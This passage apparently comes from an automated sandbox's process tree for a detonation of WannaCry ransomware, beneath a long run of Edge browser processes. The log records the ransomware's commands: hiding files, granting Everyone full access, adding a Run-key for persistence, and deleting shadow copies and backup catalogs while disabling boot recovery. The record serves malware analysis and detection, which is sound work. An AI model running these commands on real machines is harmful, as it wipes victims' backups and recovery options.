  - Suspicious behavior: EnumeratesProcesses
  PID:1336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5856 /prefetch:1
  2⤵
  PID:4828
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1
  2⤵
  PID:420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5136 /prefetch:1
  2⤵
  PID:5004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5092 /prefetch:1
  2⤵
  PID:3588
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2064 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2432
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1
  2⤵
  PID:2744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
  2⤵
  PID:2092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
  2⤵
  PID:4140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:1
  2⤵
  PID:2996
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1616 /prefetch:1
  2⤵
  PID:1456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3352 /prefetch:8
  2⤵
  PID:5020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3544 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:2292
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5136 /prefetch:1
  2⤵
  PID:4324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1
  2⤵
  PID:400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6112 /prefetch:1
  2⤵
  PID:4872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6088 /prefetch:8
  2⤵
  PID:4380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6292 /prefetch:1
  2⤵
  PID:4336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5980 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6808 /prefetch:1
  2⤵
  PID:3268
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:1
  2⤵
  PID:3328
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:1
  2⤵
  PID:1652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6820 /prefetch:1
  2⤵
  PID:3596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6932 /prefetch:1
  2⤵
  PID:4004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6796 /prefetch:1
  2⤵
  PID:4660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3564 /prefetch:1
  2⤵
  PID:844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
  2⤵
  PID:2856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6940 /prefetch:1
  2⤵
  PID:2012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5388 /prefetch:8
  2⤵
  PID:4532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7088 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1340
- C:\Users\Admin\Downloads\WannaCry.EXE
  "C:\Users\Admin\Downloads\WannaCry.EXE"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Sets desktop wallpaper using registry
  PID:3312
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h .
    3⤵
    - Views/modifies file attributes
    PID:1420
- - C:\Windows\SysWOW64\icacls.exe
    icacls . /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:1264
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:3484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 302001720209411.bat
    3⤵
    PID:4416
  - - C:\Windows\SysWOW64\cscript.exe
      cscript.exe //nologo m.vbs
      4⤵
      PID:392
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s F:\$RECYCLE
    3⤵
    - Views/modifies file attributes
    PID:1580
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected] co
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:1392
  - - C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe
      TaskData\Tor\taskhsvc.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      PID:3292
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c start /b @[email protected] vs
    3⤵
    PID:2720
  - - C:\Users\Admin\Downloads\@[email protected]
      @[email protected] vs
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:1856
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
        5⤵
        
        PID:824
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2220
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:4388
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4792
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:3972
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "oztitnmx349" /t REG_SZ /d "\"C:\Users\Admin\Downloads\tasksche.exe\"" /f
    3⤵
    PID:3088
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "oztitnmx349" /t REG_SZ /d "\"C:\Users\Admin\Downloads\tasksche.exe\"" /f
      4⤵
      Adds Run key to start application
      Modifies registry key
      PID:460
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:4064
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4824
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:3588
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:1420
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4888
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:3496
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4456
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:1948
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:3172
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2352
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Sets desktop wallpaper using registry
    - Suspicious use of SetWindowsHookEx
    PID:5068
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:440
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4284
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:2956
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:2600
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2052
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:4792
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:3692
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:400
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:4800
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:3748
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1412
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:468
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:4740
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:5932
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:5940
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:5984
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    PID:4580
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:5636
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:5756
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    PID:2112
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:4332
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:1524
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    PID:5784
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:5556
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:4392
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    PID:1520
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:4332
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:2148
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    PID:2168
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:2368
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:3416
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    PID:3100
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:2944
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:2420
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    PID:7164
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:5844
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:6240
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    - Executes dropped EXE
    PID:6924
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:6912
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    - Executes dropped EXE
    PID:6956
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    PID:6488
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:3896
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    PID:2156
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    PID:1624
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:4340
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    PID:6148
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    PID:4064
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:6308
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    PID:6668
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    PID:2848
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:7112
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    PID:3040
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    PID:4636
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:1132
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    PID:6544
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    PID:6660
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:6480
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    PID:6544
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    PID:6536
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:2348
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    PID:6400
- - C:\Users\Admin\Downloads\taskse.exe
    taskse.exe C:\Users\Admin\Downloads\@[email protected]
    3⤵
    PID:13888
- - C:\Users\Admin\Downloads\@[email protected]
    @[email protected]
    3⤵
    PID:9948
- - C:\Users\Admin\Downloads\taskdl.exe
    taskdl.exe
    3⤵
    PID:17316
- C:\Users\Admin\Downloads\WannaCry.EXE
  "C:\Users\Admin\Downloads\WannaCry.EXE"
  2⤵
  - Executes dropped EXE
  PID:4980
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h .
    3⤵
    - Views/modifies file attributes
    PID:760
- - C:\Windows\SysWOW64\icacls.exe
    icacls . /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:1156
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6944 /prefetch:1
  2⤵
  PID:2636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:1
  2⤵
  PID:5028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6972 /prefetch:1
  2⤵
  PID:4820
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3488 /prefetch:1
  2⤵
  PID:3644
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6860 /prefetch:1
  2⤵
  PID:4840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
